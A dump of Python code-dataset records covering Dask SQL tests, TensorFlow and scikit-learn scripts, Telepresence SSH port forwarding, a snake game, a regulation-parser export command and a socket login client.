\"\"\"\n SELECT * FROM new_table\n \"\"\"\n ).compute()\n\n assert_frame_equal(self.df, df)\n\n def test_create_from_csv_persist(self):\n self.df.to_csv(self.f, index=False)\n\n self.c.sql(\n f\"\"\"\n CREATE TABLE\n new_table\n WITH (\n location = '{self.f}',\n format = 'csv',\n persist = True\n )\n \"\"\"\n )\n\n df = self.c.sql(\n \"\"\"\n SELECT * FROM new_table\n \"\"\"\n ).compute()\n\n assert_frame_equal(self.df, df)\n\n def test_wrong_create(self):\n self.assertRaises(\n AttributeError,\n self.c.sql,\n f\"\"\"\n CREATE TABLE\n new_table\n WITH (\n format = 'csv'\n )\n \"\"\",\n )\n\n self.assertRaises(\n AttributeError,\n self.c.sql,\n f\"\"\"\n CREATE TABLE\n new_table\n WITH (\n format = 'strange',\n location = 'some/path'\n )\n \"\"\",\n )\n", "sub_path": "tests/integration/test_create.py", "file_name": "test_create.py", "file_ext": "py", "file_size_in_byte": 1933, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "tests.integration.fixtures.DaskTestCase", "line_number": 8, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "tempfile.gettempdir", "line_number": 12, "usage_type": "call"}, {"api_name": "os.urandom", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 17, "usage_type": "call"}, {"api_name": "os.path", "line_number": 17, "usage_type": "attribute"}, {"api_name": "os.unlink", "line_number": 18, "usage_type": "call"}, {"api_name": "pandas.testing.assert_frame_equal", "line_number": 40, "usage_type": "call"}, {"api_name": "pandas.testing.assert_frame_equal", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "276457071", "text": "import tensorflow as tf\nimport numpy as np\nimport argparse\nimport json\nimport base64\n\nmodel_dir = \"F:\\\\output\"\ninput_file = \"F:\\\\309.png\"\noutput_file = \"F:\\\\310.png\"\n\ndef main():\n\twith open(input_file, \"rb\") 
as f:\n\t\tinput_data = f.read()\n\n\tinput_instance = dict(input=base64.urlsafe_b64encode(input_data).decode(\"ascii\"), key=\"0\")\n\tinput_instance = json.loads(json.dumps(input_instance))\n\tprint(input_instance)\n\n\twith tf.Session() as sess:\n\t\tsaver = tf.train.import_meta_graph(model_dir + \"/export.meta\")\n\t\tsaver.restore(sess, model_dir + \"/export\")\n\t\tinput_vars = json.loads(tf.get_collection(\"inputs\")[0].decode())\n\t\toutput_vars = json.loads(tf.get_collection(\"outputs\")[0].decode())\n\t\tinput = tf.get_default_graph().get_tensor_by_name(input_vars[\"input\"])\n\t\toutput = tf.get_default_graph().get_tensor_by_name(output_vars[\"output\"])\n\n\t\tinput_value = np.array(input_instance[\"input\"])\n\t\toutput_value = sess.run(output, feed_dict={input: np.expand_dims(input_value, axis=0)})[0]\n\n\toutput_instance = dict(output=output_value.decode(\"ascii\"), key=\"0\")\n\n\tb64data = output_instance[\"output\"]\n\tb64data += \"=\" * (-len(b64data) % 4)\n\toutput_data = base64.urlsafe_b64decode(b64data.encode(\"ascii\"))\n\n\twith open(output_file, \"wb\") as f:\n\t\tf.write(output_data)\n\nmain()", "sub_path": "process_image_test.py", "file_name": "process_image_test.py", "file_ext": "py", "file_size_in_byte": 1258, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "base64.urlsafe_b64encode", "line_number": 15, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 16, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 16, "usage_type": "call"}, {"api_name": "tensorflow.Session", "line_number": 19, "usage_type": "call"}, {"api_name": "tensorflow.train.import_meta_graph", "line_number": 20, "usage_type": "call"}, {"api_name": "tensorflow.train", "line_number": 20, "usage_type": "attribute"}, {"api_name": "json.loads", "line_number": 22, "usage_type": "call"}, {"api_name": "tensorflow.get_collection", "line_number": 22, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.get_collection", "line_number": 23, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 24, "usage_type": "call"}, {"api_name": "tensorflow.get_default_graph", "line_number": 25, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 27, "usage_type": "call"}, {"api_name": "numpy.expand_dims", "line_number": 28, "usage_type": "call"}, {"api_name": "base64.urlsafe_b64decode", "line_number": 34, "usage_type": "call"}]} +{"seq_id": "33108175", "text": "# Copyright 2018 Datawire. 
All rights reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom typing import List, Tuple\n\nfrom telepresence.runner import Runner\n\nfrom .ssh import SSH\n\n\ndef expose_local_services(\n runner: Runner,\n ssh: SSH,\n exp_port_numbers: List[Tuple[int, int]],\n to_pod: List[int],\n from_pod: List[int],\n show_only: bool = False,\n) -> None:\n \"\"\"Create SSH tunnels from remote proxy pod to local host.\n\n The show_only param is used to show messages for the container method; the\n tunnels are created in the network container, where those messages are not\n visible to the user.\n \"\"\"\n if not exp_port_numbers and runner.chatty:\n runner.show(\n \"\\nNo traffic is being forwarded from the remote Deployment to \"\n \"your local machine. You can use the --expose option to specify \"\n \"which ports you want to forward.\"\n )\n forward_arguments = [] # type: List[str]\n for local_port, remote_port in exp_port_numbers:\n if runner.chatty:\n runner.show(\n \"Forwarding remote port {} to local port {}.\".format(\n remote_port,\n local_port,\n )\n )\n forward_arguments.extend([\n \"-R\",\n \"*:{}:127.0.0.1:{}\".format(remote_port, local_port),\n ])\n for port in to_pod:\n if runner.chatty:\n runner.show(\"Forwarding localhost:{} to the pod\".format(port))\n forward_arguments.extend([\n \"-L\",\n \"127.0.0.1:{}:127.0.0.1:{}\".format(port, port),\n ])\n for port in from_pod:\n if runner.chatty:\n runner.show(\"Forwarding localhost:{} from the pod\".format(port))\n forward_arguments.extend([\n \"-R\",\n \"127.0.0.1:{}:127.0.0.1:{}\".format(port, port),\n ])\n if forward_arguments and not show_only:\n runner.launch(\n \"SSH port forward (exposed ports)\",\n ssh.bg_command(forward_arguments)\n )\n if runner.chatty:\n runner.show(\"\\n\")\n", "sub_path": "telepresence/connect/expose.py", "file_name": "expose.py", "file_ext": "py", "file_size_in_byte": 2586, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "telepresence.runner.Runner", "line_number": 23, "usage_type": "name"}, {"api_name": "ssh.SSH", "line_number": 24, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.Tuple", "line_number": 25, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 26, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 27, "usage_type": "name"}, {"api_name": "ssh.bg_command", "line_number": 72, "usage_type": "call"}]}
+{"seq_id": "644818164", "text": "import numpy as np\nfrom keras.preprocessing import image\nimport csv\nfrom keras.utils import to_categorical\nfrom sklearn.model_selection import train_test_split\nimport cnn as CNN\nimport matplotlib.pyplot as plt # needed by plot_cnn; leaving this commented out caused a NameError\nfrom keras.models import load_model\nimport sklearn.metrics as metrics\nfrom sklearn.metrics import classification_report\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn import tree\nfrom sklearn.neighbors import 
KNeighborsClassifier\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.metrics import confusion_matrix\n\n\ndef get_images():\n\n picDat = np.ndarray(shape=(5000, 256, 256,1))\n\n for i in range(1, 5001):\n img1 = image.load_img('dataset/faceDat/' + str(int(i)) + '.png' , target_size=((256, 256)), color_mode = \"grayscale\")\n x = image.img_to_array(img1)\n x = np.expand_dims(x, axis=0)\n picDat[i - 1] = x\n pd = picDat.reshape(picDat.shape[0], picDat.shape[1] * picDat.shape[2] * picDat.shape[3])\n return pd\n\n\ndef get_labels():\n labels_file = open('./dataset/attribute_list.csv')\n file_csv = csv.reader(labels_file)\n i = -2\n hair = np.ndarray(shape=(5000,))\n\n for row in file_csv:\n if (i > -1):\n hair[i] = int(row[1]) + 1\n i = i + 1\n return hair\n\n\ndef get_data(xLabels,yLabels):\n p = 0.75\n part = int(len(yLabels) * p)\n\n tr_X = xLabels[:part]\n\n tr_Y = yLabels[:part]\n\n te_X = xLabels[part:]\n\n te_Y = yLabels[part:]\n\n tr_X = tr_X.astype('float32')\n te_X = te_X.astype('float32')\n tr_X = tr_X / 255.\n te_X = te_X / 255.\n\n # Change the labels from categorical to one-hot encoding\n train_Y_one_hot = to_categorical(tr_Y)\n test_Y_one_hot = to_categorical(te_Y)\n #print(train_Y_one_hot, tr_Y)\n train_X, valid_X, train_label, valid_label = train_test_split(tr_X, train_Y_one_hot, test_size=0.2,random_state=13)\n\n return train_X, train_label, te_X, test_Y_one_hot, valid_X, valid_label\n\n\ndef inspect(train_X, train_Y, test_X, test_Y, vX, vY):\n print('Training data shape : ', train_X.shape, train_Y.shape)\n\n print('Testing data shape : ', test_X.shape, test_Y.shape)\n\n print('Validation data shape : ', vX.shape, vY.shape)\n\n classes = np.unique(train_Y)\n\n nClasses = len(classes)\n\n print('Total number of outputs : ', nClasses)\n\n print('Output classes : ', classes)\n\n\ndef contruct_cnn(n, xTrain, yTrain, xTest, yTest, valid_X, valid_label): #check data\n batch_size = 200\n epochs = 18\n num_classes = n\n\n classifier = CNN.build(num_classes)\n\n tdr = classifier.fit(xTrain, yTrain, batch_size=batch_size, epochs=epochs, verbose=1, validation_data=(valid_X, valid_label))\n classifier.save(\"cnnmodel1.h5py\")\n loss, acc = classifier.evaluate(xTest, yTest, verbose=0)\n # print(acc * 100)\n plot_cnn(tdr)\n return acc, loss\n\n\ndef plot_cnn(fashion_train_dropout):\n accuracy = fashion_train_dropout.history['acc']\n val_accuracy = fashion_train_dropout.history['val_acc']\n loss = fashion_train_dropout.history['loss']\n val_loss = fashion_train_dropout.history['val_loss']\n epochs = range(len(accuracy))\n plt.plot(epochs, accuracy, 'bo', label='Training accuracy')\n plt.plot(epochs, val_accuracy, 'b', label='Validation accuracy')\n plt.title('Training and validation accuracy')\n plt.legend()\n plt.figure()\n plt.plot(epochs, loss, 'bo', label='Training loss')\n plt.plot(epochs, val_loss, 'b', label='Validation loss')\n plt.title('Training and validation loss')\n plt.legend()\n plt.show()\n\n\ndef get_statistacs(modelname, xTrain, yTrain, xTest, yTest, valid_X, valid_label,num_classes, ):\n model = load_model(modelname)\n loss, acc = model.evaluate(xTest, yTest, verbose=0)\n print(acc, loss)\n y_pred_one = model.predict(xTest)\n predicted_classes = np.argmax(np.round(y_pred_one), axis=1)\n\n\n confusion_matrix = metrics.confusion_matrix(y_true=np.argmax(np.round(yTest), axis=1), y_pred=predicted_classes)\n\n\n target_names = [\"Class {}\".format(i) for i in range(num_classes)]\n print(classification_report(np.argmax(np.round(yTest), axis=1), 
predicted_classes, target_names = target_names))\n\n return confusion_matrix\n\n\n#######################################\n\n\n#######################################\n\n\n#######################################\n\n\ndef train_decision_tree(training_images, training_labels, test_images, test_labels):\n\n clf = tree.DecisionTreeClassifier()\n\n clf.fit(training_images, training_labels)\n\n ans = clf.score(test_images, test_labels)\n predicted_classes = np.argmax(np.round(clf.predict(test_images)), axis=1)\n cm = metrics.confusion_matrix(y_true=np.argmax(np.round(test_labels), axis=1), y_pred=predicted_classes)\n # cm = confusion_matrix(test_labels, clf.predict(test_images))\n return ans, cm\n\n\ndef train_knn_classifier(training_images, training_labels, test_images, test_labels):\n knn = KNeighborsClassifier(n_neighbors=6).fit(training_images, training_labels)\n accuracy = knn.score(test_images, test_labels)\n # print(knn.predict(test_images))\n #knn_predictions = knn.predict(test_images)\n #cm = confusion_matrix(test_images, knn_predictions)\n\n return accuracy#, cm\n\n\ndef train_naive_bayes(training_images, training_labels, test_images, test_labels):\n gnb = GaussianNB().fit(training_images, training_labels)\n #gnb_predictions = gnb.predict(tes)\n accuracy = gnb.score(test_images, test_labels)\n #cm = confusion_matrix(y_test, gnb_predictions)\n return accuracy\n\n\ndef train_mlp(training_images, training_labels, test_images, test_labels):\n\n clf = MLPClassifier(hidden_layer_sizes=(50,50,50), activation='logistic', alpha=1, learning_rate='constant', solver='adam')\n clf.fit(training_images, training_labels)\n ans = clf.score(test_images, test_labels)\n # print(clf.predict(test_images))\n # confusion_matrix(test_labels, clf.predict(test_labels))\n return ans\n\n\ndef mlp_param_selection(X, y, nfolds):\n parameter_space = {\n # 'hidden_layer_sizes': [(50, 50, 50), (50, 100, 50), (100,), (100,100,100)],\n 'hidden_layer_sizes': [(50, 50, 50)],\n 'activation': ['identity', 'logistic', 'tanh', 'relu'],\n 'solver': ['lbfgs', 'adam', 'sgd'],\n 'alpha': [1, 0.1, 0.01, 0.001],\n 'learning_rate': ['constant', 'adaptive', 'invscaling'],\n }\n mlp = MLPClassifier()\n grid_search = GridSearchCV(mlp, parameter_space, n_jobs=-1, cv=nfolds)\n grid_search.fit(X, y)\n\n return grid_search.best_params_\n\n\n#######################################\n\n\n#######################################\n\n\n#######################################\n\ndef main():\n np.set_printoptions(threshold=np.inf)\n a,b,c,d,e,f = get_data(get_images(),get_labels())\n # inspect(a,b,c,d,e,f)\n print(contruct_cnn(6,a,b,c,d,e,f))\n print(get_statistacs(\"cnnmodel1.h5py\",a,b,c,d,e,f,6))\n # print(train_decision_tree(a,b,c,d))\n # print(train_knn_classifier(a,b,c,d))\n # print(train_naive_bayes(a,b,c,d))\n # print(train_mlp(a,b,c,d))\n # print(mlp_param_selection(c,d,2))\n # print(get_labels())\n\nif __name__ == '__main__':\n main()\n", "sub_path": "haircolour.py", "file_name": "haircolour.py", "file_ext": "py", "file_size_in_byte": 7162, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "numpy.ndarray", "line_number": 21, "usage_type": "call"}, {"api_name": "keras.preprocessing.image.load_img", "line_number": 24, "usage_type": "call"}, {"api_name": "keras.preprocessing.image", "line_number": 24, "usage_type": "name"}, {"api_name": "keras.preprocessing.image.img_to_array", "line_number": 25, "usage_type": "call"}, {"api_name": "keras.preprocessing.image", 
"line_number": 25, "usage_type": "name"}, {"api_name": "numpy.expand_dims", "line_number": 26, "usage_type": "call"}, {"api_name": "csv.reader", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.ndarray", "line_number": 36, "usage_type": "call"}, {"api_name": "keras.utils.to_categorical", "line_number": 63, "usage_type": "call"}, {"api_name": "keras.utils.to_categorical", "line_number": 64, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 66, "usage_type": "call"}, {"api_name": "numpy.unique", "line_number": 78, "usage_type": "call"}, {"api_name": "cnn.build", "line_number": 92, "usage_type": "call"}, {"api_name": "keras.models.load_model", "line_number": 121, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 125, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 125, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 128, "usage_type": "name"}, {"api_name": "sklearn.metrics", "line_number": 128, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 128, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 128, "usage_type": "call"}, {"api_name": "sklearn.metrics.classification_report", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 132, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 132, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 134, "usage_type": "name"}, {"api_name": "sklearn.tree.DecisionTreeClassifier", "line_number": 148, "usage_type": "call"}, {"api_name": "sklearn.tree", "line_number": 148, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 153, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 153, "usage_type": "call"}, {"api_name": "sklearn.metrics.confusion_matrix", "line_number": 154, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 154, "usage_type": "name"}, {"api_name": "numpy.argmax", "line_number": 154, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 154, "usage_type": "call"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 160, "usage_type": "call"}, {"api_name": "sklearn.naive_bayes.GaussianNB", "line_number": 170, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 179, "usage_type": "call"}, {"api_name": "sklearn.neural_network.MLPClassifier", "line_number": 196, "usage_type": "call"}, {"api_name": "sklearn.model_selection.GridSearchCV", "line_number": 197, "usage_type": "call"}, {"api_name": "numpy.set_printoptions", "line_number": 212, "usage_type": "call"}, {"api_name": "numpy.inf", "line_number": 212, "usage_type": "attribute"}]} +{"seq_id": "278855044", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nfrom funcs import month_to_str\nfrom PIL import Image\n\n\ndef draw_picture(day, data, month, key):\n if key == 1:\n type = \"average\"\n if key == 2:\n type = \"max\"\n if key == 3:\n type = \"min\"\n\n month = month_to_str(month)\n\n # 見やすため\n y_max = np.amax(data) + 5\n y_min = np.amin(data) - 5\n\n title = \"The \" + type + \" temperature of Okayama in \" + month\n plt.title(title)\n plt.xlabel(\"date\")\n plt.ylabel(\"temperature\")\n\n plt.ylim(y_min, y_max)\n\n plt.plot(day, data, '^', day, data)\n\n save_path = \"./output/\"\n save_name = save_path + month + \"_\" + type + \".png\"\n plt.savefig(save_name, dpi=120, format='png')\n\n # plt.show() # 
pyqt5と連携するときに、バグがある\n\n image = Image.open(save_name)\n image.show()\n", "sub_path": "printout.py", "file_name": "printout.py", "file_ext": "py", "file_size_in_byte": 847, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "funcs.month_to_str", "line_number": 15, "usage_type": "call"}, {"api_name": "numpy.amax", "line_number": 18, "usage_type": "call"}, {"api_name": "numpy.amin", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.title", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 23, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 26, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 26, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 28, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 28, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "PIL.Image.open", "line_number": 36, "usage_type": "call"}, {"api_name": "PIL.Image", "line_number": 36, "usage_type": "name"}]} +{"seq_id": "495309864", "text": "# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Mar 18 15:41:47 2016\n\n@author: EBianco\n\"\"\"\n\nfrom datetime import datetime\n\n\ndef solve(d1, d2, f):\n print(datetime.strptime(d2, f) - datetime.strptime(d1, f))\n\n'#5a'\ndate_start_a = '01-02-2013'\ndate_stop_a = '07-28-2015'\nform_a = '%m-%d-%Y'\n\nsolve(date_start_a, date_stop_a, form_a)\n\n\n'#5b'\ndate_start_b = '12312013'\ndate_stop_b = '05282015'\nform_b = '%m%d%Y'\n\nsolve(date_start_b, date_stop_b, form_b)\n\n\n'#5c'\ndate_start_c = '15-Jan-1994'\ndate_stop_c = '14-Jul-2015'\nform_c = '%d-%b-%Y'\n\nsolve(date_start_c, date_stop_c, form_c)\n\n\n\n\n\n\n\n\n\n", "sub_path": "5/q5_datetime.py", "file_name": "q5_datetime.py", "file_ext": "py", "file_size_in_byte": 583, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "datetime.datetime.strptime", "line_number": 12, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 12, "usage_type": "name"}]} +{"seq_id": "591599648", "text": "import pygame\nimport time\n\nclass gameScreen:\n def __init__(self, gameDisplay):\n self.gameDisplay = gameDisplay\n self.gameScreenWidth = self.gameDisplay.get_width()\n self.gameScreenHeight = self.gameDisplay.get_height() -30\n\n def mapUpdate(self, appleX, appleY, snake):#opravit ked nabura\n gameMap = [[0 for _ in range((int)(self.gameScreenHeight / 10))]\n for _ in range((int)(self.gameScreenWidth / 10))]\n\n #for i in range(0, len(gameMap)):#steny\n # gameMap[0][i]= 3\n # gameMap[i][0] = 3\n # gameMap[len(gameMap)-1][i] = 3\n # gameMap[i][len(gameMap)-1] = 3\n # for i in range(0, int(len(gameMap) / 2)):\n # gameMap[int(len(gameMap)/4)+ i][int(len(gameMap)/2)] = 4\n # gameMap[int(len(gameMap) / 2)][int(len(gameMap)/4) +i] = 4\n\n\n for i in range(1, len(snake)):\n gameMap[(int)(snake[i][1]/10)][(int)(snake[i][0]/10)] = 3#telo hada\n\n gameMap[(int)(snake[0][1] / 
10)][(int)(snake[0][0] / 10)] = 2# snake head\n\n gameMap[(int)(appleY / 10)][(int)(appleX / 10)] = 1# food\n\n return gameMap\n\n def mapPrint(self, gameMap):\n toDisplay = \"\"\n for i in range(0, len(gameMap)):\n for j in range(0, len(gameMap)):\n toDisplay+=(str)(gameMap[i][j])\n toDisplay+='\\n'\n print (toDisplay)\n\n def textObjects(self, text, font):\n textSurface = font.render(text, True, (255, 255, 255))\n return textSurface, textSurface.get_rect()\n\n def messageDisplay(self, text):\n largeText = pygame.font.Font('freesansbold.ttf', int(30 / 2))\n TextSurf, TextRect = self.textObjects(text, largeText)\n TextRect.center = (self.gameScreenWidth * 3/4, self.gameScreenHeight + 30 /2)\n self.gameDisplay.blit(TextSurf, TextRect)\n\n def gameScreenDisplay(self, score):\n pygame.draw.line(self.gameDisplay, (255, 255, 255), (0, self.gameScreenHeight),\n (self.gameScreenWidth, self.gameScreenHeight))\n text = 'Score: ' + str(score)\n largeText = pygame.font.Font('freesansbold.ttf', 20)\n TextSurf, TextRect = self.textObjects(text, largeText)\n TextRect.center = (\n self.gameScreenWidth * 3 / 4, self.gameScreenHeight + 10)\n self.gameDisplay.blit(TextSurf, TextRect)\n\n def messageCrashed(self, text):\n largeText = pygame.font.Font('freesansbold.ttf', int(self.gameScreenWidth / 10))\n TextSurf, TextRect = self.textObjects(text, largeText)\n TextRect.center = (self.gameScreenWidth / 2, self.gameScreenHeight / 2)\n self.gameDisplay.blit(TextSurf, TextRect)\n pygame.display.update()\n time.sleep(2)\n\n def displayWalls(self, gamemap):\n for i in range(0, len(gamemap)):\n for j in range(0, len(gamemap)):\n if gamemap[j][i] == 4:\n pygame.draw.rect(self.gameDisplay, (255, 255, 255), (i*10, j*10, 10, 10))\n\n", "sub_path": "gameScreen.py", "file_name": "gameScreen.py", "file_ext": "py", "file_size_in_byte": 2989, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "pygame.font.Font", "line_number": 46, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 46, "usage_type": "attribute"}, {"api_name": "pygame.draw.line", "line_number": 52, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 52, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 55, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 55, "usage_type": "attribute"}, {"api_name": "pygame.font.Font", "line_number": 62, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 62, "usage_type": "attribute"}, {"api_name": "pygame.display.update", "line_number": 66, "usage_type": "call"}, {"api_name": "pygame.display", "line_number": 66, "usage_type": "attribute"}, {"api_name": "time.sleep", "line_number": 67, "usage_type": "call"}, {"api_name": "pygame.draw.rect", "line_number": 73, "usage_type": "call"}, {"api_name": "pygame.draw", "line_number": 73, "usage_type": "attribute"}]}
+{"seq_id": "96940572", "text": "import click\n\nfrom regparser.api_writer import Client\nfrom regparser.index import entry\n\n\n# The write process is split into a set of functions, each responsible for\n# writing a particular type of entity\n\ndef write_trees(client, cfr_title, cfr_part):\n tree_dir = entry.Tree(cfr_title, cfr_part)\n for version_id in entry.Version(cfr_title, cfr_part):\n if version_id in tree_dir:\n click.echo(\"Writing tree \" + version_id)\n tree = (tree_dir / version_id).read()\n client.regulation(cfr_part, version_id).write(tree)\n\n\ndef write_layers(client, cfr_title, cfr_part):\n for 
version_id in entry.Version(cfr_title, cfr_part):\n layer_dir = entry.Layer(cfr_title, cfr_part, version_id)\n for layer_name in layer_dir:\n click.echo(\"Writing layer {}@{}\".format(layer_name, version_id))\n layer = (layer_dir / layer_name).read()\n client.layer(layer_name, cfr_part, version_id).write(layer)\n\n\ndef write_notices(client, cfr_title, cfr_part):\n sxs_dir = entry.SxS()\n for version_id in entry.Version(cfr_title, cfr_part):\n if version_id in sxs_dir:\n click.echo(\"Writing notice \" + version_id)\n tree = (sxs_dir / version_id).read()\n client.notice(version_id).write(tree)\n\n\ndef write_diffs(client, cfr_title, cfr_part):\n diff_dir = entry.Diff(cfr_title, cfr_part)\n version_ids = list(entry.Version(cfr_title, cfr_part))\n for lhs_id in version_ids:\n container = diff_dir / lhs_id\n for rhs_id in version_ids:\n if rhs_id in container:\n click.echo(\"Writing diff {} to {}\".format(lhs_id, rhs_id))\n diff = (container / rhs_id).read()\n client.diff(cfr_part, lhs_id, rhs_id).write(diff)\n\n\n@click.command()\n@click.argument('cfr_title', type=int)\n@click.argument('cfr_part', type=int)\n@click.argument('output')\ndef write_to(cfr_title, cfr_part, output):\n \"\"\"Export data. Sends all data in the index to an external source.\n\n \\b\n OUTPUT can be a\n * directory (if it does not exist, it will be created)\n * uri (the base url of an instance of regulations-core)\n * a directory prefixed with \"git://\". This will export to a git\n repository\"\"\"\n client = Client(output)\n cfr_part = str(cfr_part)\n write_trees(client, cfr_title, cfr_part)\n write_layers(client, cfr_title, cfr_part)\n write_notices(client, cfr_title, cfr_part)\n write_diffs(client, cfr_title, cfr_part)\n", "sub_path": "regparser/commands/write_to.py", "file_name": "write_to.py", "file_ext": "py", "file_size_in_byte": 2486, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "52", "api": [{"api_name": "regparser.index.entry.Tree", "line_number": 11, "usage_type": "call"}, {"api_name": "regparser.index.entry", "line_number": 11, "usage_type": "name"}, {"api_name": "regparser.index.entry.Version", "line_number": 12, "usage_type": "call"}, {"api_name": "regparser.index.entry", "line_number": 12, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 14, "usage_type": "call"}, {"api_name": "regparser.index.entry.Version", "line_number": 20, "usage_type": "call"}, {"api_name": "regparser.index.entry", "line_number": 20, "usage_type": "name"}, {"api_name": "regparser.index.entry.Layer", "line_number": 21, "usage_type": "call"}, {"api_name": "regparser.index.entry", "line_number": 21, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 23, "usage_type": "call"}, {"api_name": "regparser.index.entry.SxS", "line_number": 29, "usage_type": "call"}, {"api_name": "regparser.index.entry", "line_number": 29, "usage_type": "name"}, {"api_name": "regparser.index.entry.Version", "line_number": 30, "usage_type": "call"}, {"api_name": "regparser.index.entry", "line_number": 30, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 32, "usage_type": "call"}, {"api_name": "regparser.index.entry.Diff", "line_number": 38, "usage_type": "call"}, {"api_name": "regparser.index.entry", "line_number": 38, "usage_type": "name"}, {"api_name": "regparser.index.entry.Version", "line_number": 39, "usage_type": "call"}, {"api_name": "regparser.index.entry", "line_number": 39, "usage_type": "name"}, {"api_name": "click.echo", "line_number": 44, "usage_type": 
"call"}, {"api_name": "regparser.api_writer.Client", "line_number": 62, "usage_type": "call"}, {"api_name": "click.command", "line_number": 49, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 50, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 51, "usage_type": "call"}, {"api_name": "click.argument", "line_number": 52, "usage_type": "call"}]} +{"seq_id": "266314380", "text": "\"\"\"All the functions that a user can perform.\r\n The client object gets instantiated and used in ui.py\"\"\"\r\n\r\nimport socket\r\nimport json\r\n\r\nclass Client:\r\n\r\n def __init__(self):\r\n \"\"\"\r\n Creates a socket for the client, connects to server\r\n \"\"\"\r\n\r\n host = 'localhost'\r\n port = 8787\r\n self.sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)\r\n self.sock.connect((host,port))\r\n\r\n def login(self, username, pword):\r\n \"\"\"\r\n Logs the user in once connected to the server\r\n\r\n :param username: user's name\r\n :param pword: user's password\r\n\r\n :return: 0 if username doesn't exist or incorrect password OR\r\n 1 if username exists and enters correct password\r\n \"\"\"\r\n\r\n # serialize the username and pword into json\r\n info = json.dumps({'type': 'login',\r\n 'username': username,\r\n 'pword': pword})\r\n\r\n self.sock.send(info.encode())\r\n\r\n # wait for response\r\n response = int(self.sock.recv(1024).decode())\r\n return response\r\n\r\n def register(self, username, pword):\r\n '''\r\n Registers a new user\r\n\r\n :param username: new user name\r\n :param pword: new user password (encrypyted)\r\n\r\n :return: 0 if username is not unique (can't have duplicate usernames)\r\n 1 if username is unique and user is put in db\r\n '''\r\n\r\n # serialize the username and 